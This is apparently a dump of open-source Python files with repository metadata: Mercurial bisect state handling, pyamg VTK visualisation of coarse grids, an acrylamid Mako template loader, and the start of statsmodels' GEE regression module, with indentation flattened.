if not baddiff and gooddiff:
return "bad"
return "check"
def extendrange(repo, state, nodes, good):
# bisect is incomplete when it ends on a merge node and
# one of the parent was not checked.
parents = repo[nodes[0]].parents()
if len(parents) > 1:
if good:
side = state["bad"]
else:
side = state["good"]
num = len(set(i.node() for i in parents) & set(side))
if num == 1:
return parents[0].ancestor(parents[1])
return None
def load_state(repo):
state = {"current": [], "good": [], "bad": [], "skip": []}
for l in repo.localvfs.tryreadlines("bisect.state"):
l = pycompat.decodeutf8(l)
kind, node = l[:-1].split()
node = repo.lookup(node)
if kind not in state:
raise error.Abort(_("unknown bisect kind %s") % kind)
state[kind].append(node)
return state
def save_state(repo, state):
f = repo.localvfs("bisect.state", "wb", atomictemp=True)
with repo.wlock():
for kind in sorted(state):
for node in state[kind]:
f.writeutf8("%s %s\n" % (kind, hex(node)))
f.close()
def resetstate(repo):
"""remove any bisect state from the repository"""
if repo.localvfs.exists("bisect.state"):
repo.localvfs.unlink("bisect.state")
def checkstate(state):
"""check we have both 'good' and 'bad' to define a range
Raise Abort exception otherwise."""
if state["good"] and state["bad"]:
return True
if not state["good"]:
raise error.Abort(_("cannot bisect (no known good revisions)"))
else:
raise error.Abort(_("cannot bisect (no known bad revisions)"))
def get(repo, status):
"""
Return a list of revision(s) that match the given status:
- ``good``, ``bad``, ``skip``: csets explicitly marked as good/bad/skip
- ``goods``, ``bads`` : csets topologically good/bad
- ``range`` : csets taking part in the bisection
- ``pruned`` : csets that are goods, bads or skipped
- ``untested`` : csets whose fate is yet unknown
- ``ignored`` : csets ignored due to DAG topology
- ``current`` : the cset currently being bisected
"""
state = load_state(repo)
if status in ("good", "bad", "skip", "current"):
return list(map(repo.changelog.rev, state[status]))
else:
# In the following sets, we do *not* call 'bisect()' with more
# than one level of recursion, because that can be very, very
# time consuming. Instead, we always develop the expression as
# much as possible.
# 'range' is all csets that make the bisection:
# - have a good ancestor and a bad descendant, or conversely
# that's because the bisection can go either way
range = "( bisect(bad)::bisect(good) | bisect(good)::bisect(bad) )"
_t = repo.revs("bisect(good)::bisect(bad)")
# The sets of topologically good or bad csets
if len(_t) == 0:
# Goods are topologically after bads
goods = "bisect(good)::" # Pruned good csets
bads = "::bisect(bad)" # Pruned bad csets
else:
# Goods are topologically before bads
goods = "::bisect(good)" # Pruned good csets
bads = "bisect(bad)::" # Pruned bad csets
# 'pruned' is all csets whose fate is already known: good, bad, skip
skips = "bisect(skip)" # Pruned skipped csets
pruned = "( (%s) | (%s) | (%s) )" % (goods, bads, skips)
# 'untested' is all cset that are- in 'range', but not in 'pruned'
untested = "( (%s) - (%s) )" % (range, pruned)
# 'ignored' is all csets that were not used during the bisection
# due to DAG topology, but may however have had an impact.
# E.g., a branch merged between bads and goods, but whose branch-
# point is out-side of the range.
iba = "::bisect(bad) - ::bisect(good)" # Ignored bads' ancestors
iga = "::bisect(good) - ::bisect(bad)" # Ignored goods' ancestors
ignored = "( ( (%s) | (%s) ) - (%s) )" % (iba, iga, range)
if status == "range":
return repo.revs(range)
elif status == "pruned":
return repo.revs(pruned)
elif status == "untested":
return repo.revs(untested)
elif status == "ignored":
return repo.revs(ignored)
elif status == "goods":
return repo.revs(goods)
elif status == "bads":
return repo.revs(bads)
else:
raise error.ParseError(_("invalid bisect state"))
def label(repo, node):
rev = repo.changelog.rev(node)
# Try explicit sets
if rev in get(repo, "good"):
# i18n: bisect changeset status
return _("good")
if rev in get(repo, "bad"):
# i18n: bisect changeset status
return _("bad")
if rev in get(repo, "skip"):
# i18n: bisect changeset status
return _("skipped")
if rev in get(repo, "untested") or rev in get(repo, "current"):
# i18n: bisect changeset status
return _("untested")
if rev in get(repo, "ignored"):
# i18n: bisect changeset status
return _("ignored")
# Try implicit sets
if rev in get(repo, "goods"):
# i18n: bisect changeset status
return _("good (implicit)")
if rev in get(repo, "bads"):
# i18n: bisect changeset status
return _("bad (implicit)")
return None
def shortlabel(label):
if label:
return label[0].upper()
return None
def printresult(ui, repo, state, displayer, nodes, good):
if len(nodes) == 1:
# narrowed it down to a single revision
if good:
ui.write(_("The first good revision is:\n"))
else:
ui.write(_("The first bad revision is:\n"))
displayer.show(repo[nodes[0]])
extendnode = extendrange(repo, state, nodes, good)
if extendnode is not None:
ui.write(
_(
"Not all ancestors of this changeset have been"
" checked.\nUse bisect --extend to continue the "
"bisection from\nthe common ancestor, %s.\n"
)
% extendnode
)
else:
# multiple possible revisions
if good:
ui.write(
_(
"Due to skipped revisions, the first "
"good revision could be any of:\n"
)
)
else:
ui.write(
_(
"Due to skipped revisions, the first "
"bad revision could be any of:\n"
)
)
for n in nodes:
displayer.show(repo[n])
displayer.close()
|
facebookexperimental/eden
|
eden/scm/edenscm/mercurial/hbisect.py
|
Python
|
gpl-2.0
| 12,464
|
[
"VisIt"
] |
c09a3faaad317b617bf9a5dda0dab03138c90ae6ee7a72abbf3ee13743d7795b
|
"""
Visualization tools for coarse grids, both C/F splittings and aggregation.
Output is either to file (VTK) or to the screen (matplotlib).
vis_splitting: visualize C/F splittings through vertex elements
vis_aggregate_groups: visualize aggregation through groupins of edges, elements
"""
__docformat__ = "restructuredtext en"
import warnings
import numpy as np
from scipy.sparse import csr_matrix, coo_matrix, triu
from vtk_writer import write_basic_mesh, write_vtu
__all__ = ['vis_splitting', 'vis_aggregate_groups']
def vis_aggregate_groups(Verts, E2V, Agg, mesh_type, output='vtk',
fname='output.vtu'):
"""
Coarse grid visualization of aggregate groups. Create .vtu files for use
in Paraview or display with Matplotlib
Parameters
----------
Verts : {array}
coordinate array (N x D)
E2V : {array}
element index array (Nel x Nelnodes)
Agg : {csr_matrix}
sparse matrix for the aggregate-vertex relationship (N x Nagg)
mesh_type : {string}
type of elements: vertex, tri, quad, tet, hex (all 3d)
fname : {string, file object}
file to be written, e.g. 'output.vtu'
output : {string}
'vtk' or 'matplotlib'
Returns
-------
- Writes data to .vtu file for use in paraview (xml 0.1 format) or
displays to screen using matplotlib
Notes
-----
- Works for both 2d and 3d elements. Element groupings are colored
with data equal to 2.0 and stringy edges in the aggregate are colored
with 3.0
Examples
--------
>>> from pyamg.aggregation import standard_aggregation
>>> from pyamg.vis.vis_coarse import vis_aggregate_groups
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_square')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> Agg = standard_aggregation(A)[0]
>>> vis_aggregate_groups(Verts=V, E2V=E2V, Agg=Agg, mesh_type='tri',
output='vtk', fname='output.vtu')
>>> from pyamg.aggregation import standard_aggregation
>>> from pyamg.vis.vis_coarse import vis_aggregate_groups
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_cube')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> Agg = standard_aggregation(A)[0]
>>> vis_aggregate_groups(Verts=V, E2V=E2V, Agg=Agg, mesh_type='tet',
output='vtk', fname='output.vtu')
"""
check_input(Verts=Verts, E2V=E2V, Agg=Agg, mesh_type=mesh_type)
map_type_to_key = {'tri': 5, 'quad': 9, 'tet': 10, 'hex': 12}
if mesh_type not in map_type_to_key:
raise ValueError('unknown mesh_type=%s' % mesh_type)
key = map_type_to_key[mesh_type]
Agg = csr_matrix(Agg)
# remove elements with dirichlet BCs
if E2V.max() >= Agg.shape[0]:
E2V = E2V[E2V.max(axis=1) < Agg.shape[0]]
# 1 #
# Find elements with all vertices in same aggregate
# account for 0 rows. Mark them as solitary aggregates
# TODO: (Luke) full_aggs is not defined, I think its just a mask
# indicated with rows are not 0.
if len(Agg.indices) != Agg.shape[0]:
full_aggs = ((Agg.indptr[1:] - Agg.indptr[:-1]) == 0).nonzero()[0]
new_aggs = np.array(Agg.sum(axis=1), dtype=int).ravel()
new_aggs[full_aggs == 1] = Agg.indices # keep existing aggregate IDs
new_aggs[full_aggs == 0] = Agg.shape[1] # fill in singletons maxID+1
ElementAggs = new_aggs[E2V]
else:
ElementAggs = Agg.indices[E2V]
# 2 #
# find all aggregates encompassing full elements
# mask[i] == True if all vertices in element i belong to the same aggregate
mask = np.where(abs(np.diff(ElementAggs)).max(axis=1) == 0)[0]
# mask = (ElementAggs[:,:] == ElementAggs[:,0]).all(axis=1)
E2V_a = E2V[mask, :] # elements where element is full
Nel_a = E2V_a.shape[0]
# 3 #
# find edges of elements in the same aggregate (brute force)
# construct vertex to vertex graph
col = E2V.ravel()
row = np.kron(np.arange(0, E2V.shape[0]),
np.ones((E2V.shape[1],), dtype=int))
data = np.ones((len(col),))
if len(row) != len(col):
raise ValueError('Problem constructing vertex-to-vertex map')
V2V = coo_matrix((data, (row, col)), shape=(E2V.shape[0], E2V.max()+1))
V2V = V2V.T * V2V
V2V = triu(V2V, 1).tocoo()
# get all the edges
edges = np.vstack((V2V.row, V2V.col)).T
# all the edges in the same aggregate
E2V_b = edges[Agg.indices[V2V.row] == Agg.indices[V2V.col]]
Nel_b = E2V_b.shape[0]
# 3.5 #
# single node aggregates
sums = np.array(Agg.sum(axis=0)).ravel()
E2V_c = np.where(sums == 1)[0]
Nel_c = len(E2V_c)
# 4 #
# now write out the elements and edges
colors_a = 3*np.ones((Nel_a,)) # color triangles with threes
colors_b = 2*np.ones((Nel_b,)) # color edges with twos
colors_c = 1*np.ones((Nel_c,)) # color the vertices with ones
Cells = {1: E2V_c, 3: E2V_b, key: E2V_a}
cdata = {1: colors_c, 3: colors_b, key: colors_a} # make sure it's a tuple
write_vtu(Verts=Verts, Cells=Cells, fname=fname, cdata=cdata)
def vis_splitting(Verts, splitting, output='vtk', fname='output.vtu'):
"""
Coarse grid visualization for C/F splittings.
Parameters
----------
Verts : {array}
coordinate array (N x D)
splitting : {array}
coarse(1)/fine(0) flags
fname : {string, file object}
file to be written, e.g. 'output.vtu'
output : {string}
'vtk' or 'matplotlib'
Returns
-------
- Displays in screen or writes data to .vtu file for use in paraview
(xml 0.1 format)
Notes
-----
D :
dimension of coordinate space
N :
# of vertices in the mesh represented in Verts
Ndof :
# of dof (= ldof * N)
- simply color different points with different colors. This works
best with classical AMG.
- writes a file (or opens a window) for each dof
- for Ndof>1, they are assumed orderd [...dof1..., ...dof2..., etc]
Examples
--------
>>> import numpy as np
>>> from pyamg.vis.vis_coarse import vis_splitting
>>> Verts = np.array([[0.0,0.0],
... [1.0,0.0],
... [0.0,1.0],
... [1.0,1.0]])
>>> splitting = np.array([0,1,0,1,1,0,1,0]) # two variables
>>> vis_splitting(Verts,splitting,output='vtk',fname='output.vtu')
>>> from pyamg.classical import RS
>>> from pyamg.vis.vis_coarse import vis_splitting
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_square')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> splitting = RS(A)
>>> vis_splitting(Verts=V,splitting=splitting,output='vtk',
fname='output.vtu')
"""
check_input(Verts, splitting)
N = Verts.shape[0]
Ndof = len(splitting) / N
E2V = np.arange(0, N, dtype=int)
# adjust name in case of multiple variables
a = fname.split('.')
if len(a) < 2:
fname1 = a[0]
fname2 = '.vtu'
elif len(a) >= 2:
fname1 = "".join(a[:-1])
fname2 = a[-1]
else:
raise ValueError('problem with fname')
new_fname = fname
for d in range(0, Ndof):
# for each variables, write a file or open a figure
if Ndof > 1:
new_fname = fname1 + '_%d.' % (d+1) + fname2
cdata = splitting[(d*N):((d+1)*N)]
if output == 'vtk':
write_basic_mesh(Verts=Verts, E2V=E2V, mesh_type='vertex',
cdata=cdata, fname=new_fname)
elif output == 'matplotlib':
from pylab import figure, show, plot, xlabel, ylabel, title, axis
cdataF = np.where(cdata == 0)[0]
cdataC = np.where(cdata == 1)[0]
xC = Verts[cdataC, 0]
yC = Verts[cdataC, 1]
xF = Verts[cdataF, 0]
yF = Verts[cdataF, 1]
figure()
plot(xC, yC, 'r.', xF, yF, 'b.', clip_on=True)
title('C/F splitting (red=coarse, blue=fine)')
xlabel('x')
ylabel('y')
axis('off')
show()
else:
raise ValueError('problem with outputtype')
def check_input(Verts=None, E2V=None, Agg=None, A=None, splitting=None,
mesh_type=None):
"""Check input for local functions"""
if Verts is not None:
if not np.issubdtype(Verts.dtype, float):
raise ValueError('Verts should be of type float')
if E2V is not None:
if not np.issubdtype(E2V.dtype, np.integer):
raise ValueError('E2V should be of type integer')
if E2V.min() != 0:
warnings.warn('element indices begin at %d' % E2V.min())
if Agg is not None:
if Agg.shape[1] > Agg.shape[0]:
raise ValueError('Agg should be of size Npts x Nagg')
if A is not None:
if Agg is not None:
if (A.shape[0] != A.shape[1]) or (A.shape[0] != Agg.shape[0]):
raise ValueError('expected square matrix A\
and compatible with Agg')
else:
raise ValueError('problem with check_input')
if splitting is not None:
splitting = splitting.ravel()
if Verts is not None:
if (len(splitting) % Verts.shape[0]) != 0:
raise ValueError('splitting must be a multiple of N')
else:
raise ValueError('problem with check_input')
if mesh_type is not None:
valid_mesh_types = ('vertex', 'tri', 'quad', 'tet', 'hex')
if mesh_type not in valid_mesh_types:
raise ValueError('mesh_type should be %s' %
' or '.join(valid_mesh_types))
|
huahbo/pyamg
|
pyamg/vis/vis_coarse.py
|
Python
|
mit
| 10,031
|
[
"ParaView",
"VTK"
] |
17475e6c5b00bd6d0f67bc916dfa05e0ea98701d4be9c9593ba9932af6326ef3
|
# -*- encoding: utf-8 -*-
#
# Copyright 2012 Moritz Schlarb <mail@moritz-schlarb.de>. All rights reserved.
# Copyright 2013 Martin Zimmermann <info@posativ.org>. All rights reserved.
# License: BSD Style, 2 clauses -- see LICENSE.
from __future__ import absolute_import
import os
import io
import re
import ast
import posixpath
from os.path import getmtime, isfile
from itertools import chain
from collections import defaultdict
from acrylamid.templates import AbstractEnvironment, AbstractTemplate
from mako.lookup import TemplateLookup
from mako import exceptions, runtime
try:
from acrylamid.assets.web import Mixin
except ImportError:
from acrylamid.assets.fallback import Mixin
class CallVisitor(ast.NodeVisitor):
def __init__(self, callback):
self.callback = callback
super(CallVisitor, self).__init__()
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
self.callback(node)
def unast(node):
if isinstance(node, ast.Str):
return node.s
elif isinstance(node, ast.List):
return [unast(item) for item in node.elts]
raise NotImplementedError(node)
def find_assets(tt):
"""
Parse AST from Mako template and yield *args, **kwargs from any
`compile` call.
"""
rv = []
def collect(node):
if node.func.id != "compile":
return
args = list(unast(x) for x in node.args)
kwargs = dict((x.arg, unast(x.value)) for x in node.keywords)
rv.append((args, kwargs))
CallVisitor(collect).visit(ast.parse(tt.code))
for args, kwargs in rv:
yield args, kwargs
class ExtendedLookup(TemplateLookup):
"""
Custom Mako template lookup that records dependencies, mtime and referenced
web assets.
"""
inherits = re.compile(r'<%inherit file="([^"]+)" />')
includes = re.compile(r'<%namespace file="([^"]+)" import="[^"]+" />')
def __init__(self, *args, **kwargs):
# remember already resolved templates -> modified state
# TODO don't assume macros.html never changes
self.modified = {'macros.html': False}
# requested template -> parents as flat list
self.resolved = defaultdict(set)
# assets in the form of theme/base.html -> (*args, **kwargs)
self.assets = defaultdict(list)
super(ExtendedLookup, self).__init__(*args, **kwargs)
def get_template(self, uri):
"""This is stolen and truncated from mako.lookup:TemplateLookup."""
u = re.sub(r'^/+', '', uri)
for dir in self.directories:
filename = posixpath.normpath(posixpath.join(dir, u))
if os.path.isfile(filename):
return self._load(filename, uri)
else:
raise exceptions.TopLevelLookupException(
"Cant locate template for uri %r" % uri)
def _load(self, filename, uri):
deps = [uri, ]
while len(deps) > 0:
child = deps.pop()
if child in self.modified:
continue
for directory in self.directories:
filename = posixpath.normpath(posixpath.join(directory, child))
if isfile(filename):
break
p = self.modulename_callable(filename, child)
try:
modified = getmtime(filename) > getmtime(p)
except OSError:
modified = True
self.modified[child] = modified
with io.open(filename, encoding='utf-8') as fp:
source = fp.read()
parents = chain(self.inherits.finditer(source), self.includes.finditer(source))
for match in parents:
self.resolved[child].add(match.group(1))
deps.append(match.group(1))
# TODO: definitely an ugly way (= side effect) to get the byte code
tt = super(ExtendedLookup, self)._load(filename, child)
for args, kwargs in find_assets(tt):
self.assets[uri].append((args, kwargs))
# already cached due side effect above
return self._collection[uri]
class Environment(AbstractEnvironment):
extension = ['.html', '.mako']
def __init__(self, layoutdirs, cachedir):
self._mako = ExtendedLookup(
directories=layoutdirs,
module_directory=cachedir,
# similar to mako.template.Template.__init__ but with
# leading cache_ for the acrylamid cache
modulename_callable=lambda filename, uri:\
os.path.join(os.path.abspath(cachedir), 'cache_' +
os.path.normpath(uri.lstrip('/')) + '.py'),
input_encoding='utf-8')
self.filters = {}
def register(self, name, func):
self.filters[name] = func
def fromfile(self, env, path):
return Template(env, path, self._mako.get_template(path))
def extend(self, path):
self._mako.directories.append(path)
@property
def loader(self):
return self._mako
class Template(AbstractTemplate, Mixin):
def render(self, **kw):
# we inject the filter functions as top-level objects into the template,
# that's probably the only way that works with Mako
kw.update(self.engine.filters)
buf = io.StringIO()
ctx = runtime.Context(buf, **kw)
self.template.render_context(ctx)
return buf
# For debugging template compilation:
# TODO: Integrate this with acrylamid somehow
#from mako import exceptions as mako_exceptions
#try:
# return self.template.render(**kw)
#except:
# print mako_exceptions.text_error_template().render()
# return unicode(mako_exceptions.html_error_template().render())
|
markvl/acrylamid
|
acrylamid/templates/mako.py
|
Python
|
bsd-2-clause
| 5,841
|
[
"VisIt"
] |
b53e2ac6afc3b147dc0080112ade1fad85d2f16ac09532b3a0bea6f9306cad97
|
"""
Procedures for fitting marginal regression models to dependent data
using Generalized Estimating Equations.
References
----------
KY Liang and S Zeger. "Longitudinal data analysis using
generalized linear models". Biometrika (1986) 73 (1): 13-22.
S Zeger and KY Liang. "Longitudinal Data Analysis for Discrete and
Continuous Outcomes". Biometrics Vol. 42, No. 1 (Mar., 1986),
pp. 121-130
A Rotnitzky and NP Jewell (1990). "Hypothesis testing of regression
parameters in semiparametric generalized linear models for cluster
correlated data", Biometrika, 77, 485-497.
Xu Guo and Wei Pan (2002). "Small sample performance of the score
test in GEE".
http://www.sph.umn.edu/faculty1/wp-content/uploads/2012/11/rr2002-013.pdf
LA Mancl LA, TA DeRouen (2001). A covariance estimator for GEE with
improved small-sample properties. Biometrics. 2001 Mar;57(1):126-34.
"""
from statsmodels.compat.python import lzip
from statsmodels.compat.pandas import Appender
import numpy as np
from scipy import stats
import pandas as pd
import patsy
from collections import defaultdict
from statsmodels.tools.decorators import cache_readonly
import statsmodels.base.model as base
# used for wrapper:
import statsmodels.regression.linear_model as lm
import statsmodels.base.wrapper as wrap
from statsmodels.genmod import families
from statsmodels.genmod.generalized_linear_model import GLM, GLMResults
from statsmodels.genmod import cov_struct as cov_structs
import statsmodels.genmod.families.varfuncs as varfuncs
from statsmodels.genmod.families.links import Link
from statsmodels.tools.sm_exceptions import (ConvergenceWarning,
DomainWarning,
IterationLimitWarning,
ValueWarning)
import warnings
from statsmodels.graphics._regressionplots_doc import (
_plot_added_variable_doc,
_plot_partial_residuals_doc,
_plot_ceres_residuals_doc)
from statsmodels.discrete.discrete_margins import (
_get_margeff_exog, _check_margeff_args, _effects_at, margeff_cov_with_se,
_check_at_is_all, _transform_names, _check_discrete_args,
_get_dummy_index, _get_count_index)
class ParameterConstraint(object):
"""
A class for managing linear equality constraints for a parameter
vector.
"""
def __init__(self, lhs, rhs, exog):
"""
Parameters
----------
lhs : ndarray
A q x p matrix which is the left hand side of the
constraint lhs * param = rhs. The number of constraints is
q >= 1 and p is the dimension of the parameter vector.
rhs : ndarray
A 1-dimensional vector of length q which is the right hand
side of the constraint equation.
exog : ndarray
The n x p exognenous data for the full model.
"""
# In case a row or column vector is passed (patsy linear
# constraints passes a column vector).
rhs = np.atleast_1d(rhs.squeeze())
if rhs.ndim > 1:
raise ValueError("The right hand side of the constraint "
"must be a vector.")
if len(rhs) != lhs.shape[0]:
raise ValueError("The number of rows of the left hand "
"side constraint matrix L must equal "
"the length of the right hand side "
"constraint vector R.")
self.lhs = lhs
self.rhs = rhs
# The columns of lhs0 are an orthogonal basis for the
# orthogonal complement to row(lhs), the columns of lhs1 are
# an orthogonal basis for row(lhs). The columns of lhsf =
# [lhs0, lhs1] are mutually orthogonal.
lhs_u, lhs_s, lhs_vt = np.linalg.svd(lhs.T, full_matrices=1)
self.lhs0 = lhs_u[:, len(lhs_s):]
self.lhs1 = lhs_u[:, 0:len(lhs_s)]
self.lhsf = np.hstack((self.lhs0, self.lhs1))
# param0 is one solution to the underdetermined system
# L * param = R.
self.param0 = np.dot(self.lhs1, np.dot(lhs_vt, self.rhs) /
lhs_s)
self._offset_increment = np.dot(exog, self.param0)
self.orig_exog = exog
self.exog_fulltrans = np.dot(exog, self.lhsf)
def offset_increment(self):
"""
Returns a vector that should be added to the offset vector to
accommodate the constraint.
Parameters
----------
exog : array_like
The exogeneous data for the model.
"""
return self._offset_increment
def reduced_exog(self):
"""
Returns a linearly transformed exog matrix whose columns span
the constrained model space.
Parameters
----------
exog : array_like
The exogeneous data for the model.
"""
return self.exog_fulltrans[:, 0:self.lhs0.shape[1]]
def restore_exog(self):
"""
Returns the full exog matrix before it was reduced to
satisfy the constraint.
"""
return self.orig_exog
def unpack_param(self, params):
"""
Converts the parameter vector `params` from reduced to full
coordinates.
"""
return self.param0 + np.dot(self.lhs0, params)
def unpack_cov(self, bcov):
"""
Converts the covariance matrix `bcov` from reduced to full
coordinates.
"""
return np.dot(self.lhs0, np.dot(bcov, self.lhs0.T))
_gee_init_doc = """
Marginal regression model fit using Generalized Estimating Equations.
GEE can be used to fit Generalized Linear Models (GLMs) when the
data have a grouped structure, and the observations are possibly
correlated within groups but not between groups.
Parameters
----------
endog : array_like
1d array of endogenous values (i.e. responses, outcomes,
dependent variables, or 'Y' values).
exog : array_like
2d array of exogeneous values (i.e. covariates, predictors,
independent variables, regressors, or 'X' values). A `nobs x
k` array where `nobs` is the number of observations and `k` is
the number of regressors. An intercept is not included by
default and should be added by the user. See
`statsmodels.tools.add_constant`.
groups : array_like
A 1d array of length `nobs` containing the group labels.
time : array_like
A 2d array of time (or other index) values, used by some
dependence structures to define similarity relationships among
observations within a cluster.
family : family class instance
%(family_doc)s
cov_struct : CovStruct class instance
The default is Independence. To specify an exchangeable
structure use cov_struct = Exchangeable(). See
statsmodels.genmod.cov_struct.CovStruct for more
information.
offset : array_like
An offset to be included in the fit. If provided, must be
an array whose length is the number of rows in exog.
dep_data : array_like
Additional data passed to the dependence structure.
constraint : (ndarray, ndarray)
If provided, the constraint is a tuple (L, R) such that the
model parameters are estimated under the constraint L *
param = R, where L is a q x p matrix and R is a
q-dimensional vector. If constraint is provided, a score
test is performed to compare the constrained model to the
unconstrained model.
update_dep : bool
If true, the dependence parameters are optimized, otherwise
they are held fixed at their starting values.
weights : array_like
An array of case weights to use in the analysis.
%(extra_params)s
See Also
--------
statsmodels.genmod.families.family
:ref:`families`
:ref:`links`
Notes
-----
Only the following combinations make sense for family and link ::
+ ident log logit probit cloglog pow opow nbinom loglog logc
Gaussian | x x x
inv Gaussian | x x x
binomial | x x x x x x x x x
Poisson | x x x
neg binomial | x x x x
gamma | x x x
Not all of these link functions are currently available.
Endog and exog are references so that if the data they refer
to are already arrays and these arrays are changed, endog and
exog will change.
The "robust" covariance type is the standard "sandwich estimator"
(e.g. Liang and Zeger (1986)). It is the default here and in most
other packages. The "naive" estimator gives smaller standard
errors, but is only correct if the working correlation structure
is correctly specified. The "bias reduced" estimator of Mancl and
DeRouen (Biometrics, 2001) reduces the downward bias of the robust
estimator.
The robust covariance provided here follows Liang and Zeger (1986)
and agrees with R's gee implementation. To obtain the robust
standard errors reported in Stata, multiply by sqrt(N / (N - g)),
where N is the total sample size, and g is the average group size.
%(notes)s
Examples
--------
%(example)s
"""
_gee_nointercept = """
The nominal and ordinal GEE models should not have an intercept
(either implicit or explicit). Use "0 + " in a formula to
suppress the intercept.
"""
_gee_family_doc = """\
The default is Gaussian. To specify the binomial
distribution use `family=sm.families.Binomial()`. Each family
can take a link instance as an argument. See
statsmodels.genmod.families.family for more information."""
_gee_ordinal_family_doc = """\
The only family supported is `Binomial`. The default `Logit`
link may be replaced with `probit` if desired."""
_gee_nominal_family_doc = """\
The default value `None` uses a multinomial logit family
specifically designed for use with GEE. Setting this
argument to a non-default value is not currently supported."""
_gee_fit_doc = """
Fits a marginal regression model using generalized estimating
equations (GEE).
Parameters
----------
maxiter : int
The maximum number of iterations
ctol : float
The convergence criterion for stopping the Gauss-Seidel
iterations
start_params : array_like
A vector of starting values for the regression
coefficients. If None, a default is chosen.
params_niter : int
The number of Gauss-Seidel updates of the mean structure
parameters that take place prior to each update of the
dependence structure.
first_dep_update : int
No dependence structure updates occur before this
iteration number.
cov_type : str
One of "robust", "naive", or "bias_reduced".
ddof_scale : scalar or None
The scale parameter is estimated as the sum of squared
Pearson residuals divided by `N - ddof_scale`, where N
is the total sample size. If `ddof_scale` is None, the
number of covariates (including an intercept if present)
is used.
scaling_factor : scalar
The estimated covariance of the parameter estimates is
scaled by this value. Default is 1, Stata uses N / (N - g),
where N is the total sample size and g is the average group
size.
scale : str or float, optional
`scale` can be None, 'X2', or a float
If a float, its value is used as the scale parameter.
The default value is None, which uses `X2` (Pearson's
chi-square) for Gamma, Gaussian, and Inverse Gaussian.
The default is 1 for the Binomial and Poisson families.
Returns
-------
An instance of the GEEResults class or subclass
Notes
-----
If convergence difficulties occur, increase the values of
`first_dep_update` and/or `params_niter`. Setting
`first_dep_update` to a greater value (e.g. ~10-20) causes the
algorithm to move close to the GLM solution before attempting
to identify the dependence structure.
For the Gaussian family, there is no benefit to setting
`params_niter` to a value greater than 1, since the mean
structure parameters converge in one step.
"""
_gee_results_doc = """
Attributes
----------
cov_params_default : ndarray
default covariance of the parameter estimates. Is chosen among one
of the following three based on `cov_type`
cov_robust : ndarray
covariance of the parameter estimates that is robust
cov_naive : ndarray
covariance of the parameter estimates that is not robust to
correlation or variance misspecification
cov_robust_bc : ndarray
covariance of the parameter estimates that is robust and bias
reduced
converged : bool
indicator for convergence of the optimization.
True if the norm of the score is smaller than a threshold
cov_type : str
string indicating whether a "robust", "naive" or "bias_reduced"
covariance is used as default
fit_history : dict
Contains information about the iterations.
fittedvalues : ndarray
Linear predicted values for the fitted model.
dot(exog, params)
model : class instance
Pointer to GEE model instance that called `fit`.
normalized_cov_params : ndarray
See GEE docstring
params : ndarray
The coefficients of the fitted model. Note that
interpretation of the coefficients often depends on the
distribution family and the data.
scale : float
The estimate of the scale / dispersion for the model fit.
See GEE.fit for more information.
score_norm : float
norm of the score at the end of the iterative estimation.
bse : ndarray
The standard errors of the fitted GEE parameters.
"""
_gee_example = """
Logistic regression with autoregressive working dependence:
>>> import statsmodels.api as sm
>>> family = sm.families.Binomial()
>>> va = sm.cov_struct.Autoregressive()
>>> model = sm.GEE(endog, exog, group, family=family, cov_struct=va)
>>> result = model.fit()
>>> print(result.summary())
Use formulas to fit a Poisson GLM with independent working
dependence:
>>> import statsmodels.api as sm
>>> fam = sm.families.Poisson()
>>> ind = sm.cov_struct.Independence()
>>> model = sm.GEE.from_formula("y ~ age + trt + base", "subject",
data, cov_struct=ind, family=fam)
>>> result = model.fit()
>>> print(result.summary())
Equivalent, using the formula API:
>>> import statsmodels.api as sm
>>> import statsmodels.formula.api as smf
>>> fam = sm.families.Poisson()
>>> ind = sm.cov_struct.Independence()
>>> model = smf.gee("y ~ age + trt + base", "subject",
data, cov_struct=ind, family=fam)
>>> result = model.fit()
>>> print(result.summary())
"""
_gee_ordinal_example = """
Fit an ordinal regression model using GEE, with "global
odds ratio" dependence:
>>> import statsmodels.api as sm
>>> gor = sm.cov_struct.GlobalOddsRatio("ordinal")
>>> model = sm.OrdinalGEE(endog, exog, groups, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using formulas:
>>> import statsmodels.formula.api as smf
>>> model = smf.ordinal_gee("y ~ 0 + x1 + x2", groups, data,
cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
"""
_gee_nominal_example = """
Fit a nominal regression model using GEE:
>>> import statsmodels.api as sm
>>> import statsmodels.formula.api as smf
>>> gor = sm.cov_struct.GlobalOddsRatio("nominal")
>>> model = sm.NominalGEE(endog, exog, groups, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using formulas:
>>> import statsmodels.api as sm
>>> model = sm.NominalGEE.from_formula("y ~ 0 + x1 + x2", groups,
data, cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
Using the formula API:
>>> import statsmodels.formula.api as smf
>>> model = smf.nominal_gee("y ~ 0 + x1 + x2", groups, data,
cov_struct=gor)
>>> result = model.fit()
>>> print(result.summary())
"""
def _check_args(endog, exog, groups, time, offset, exposure):
if endog.size != exog.shape[0]:
raise ValueError("Leading dimension of 'exog' should match "
"length of 'endog'")
if groups.size != endog.size:
raise ValueError("'groups' and 'endog' should have the same size")
if time is not None and (time.size != endog.size):
raise ValueError("'time' and 'endog' should have the same size")
if offset is not None and (offset.size != endog.size):
raise ValueError("'offset and 'endog' should have the same size")
if exposure is not None and (exposure.size != endog.size):
raise ValueError("'exposure' and 'endog' should have the same size")
class GEE(GLM):
__doc__ = (
" Marginal Regression Model using Generalized Estimating "
"Equations.\n" + _gee_init_doc %
{'extra_params': base._missing_param_doc,
'family_doc': _gee_family_doc,
'example': _gee_example,
'notes': ""})
cached_means = None
def __init__(self, endog, exog, groups, time=None, family=None,
cov_struct=None, missing='none', offset=None,
exposure=None, dep_data=None, constraint=None,
update_dep=True, weights=None, **kwargs):
if family is not None:
if not isinstance(family.link, tuple(family.safe_links)):
import warnings
msg = ("The {0} link function does not respect the "
"domain of the {1} family.")
warnings.warn(msg.format(family.link.__class__.__name__,
family.__class__.__name__),
DomainWarning)
groups = np.asarray(groups) # in case groups is pandas
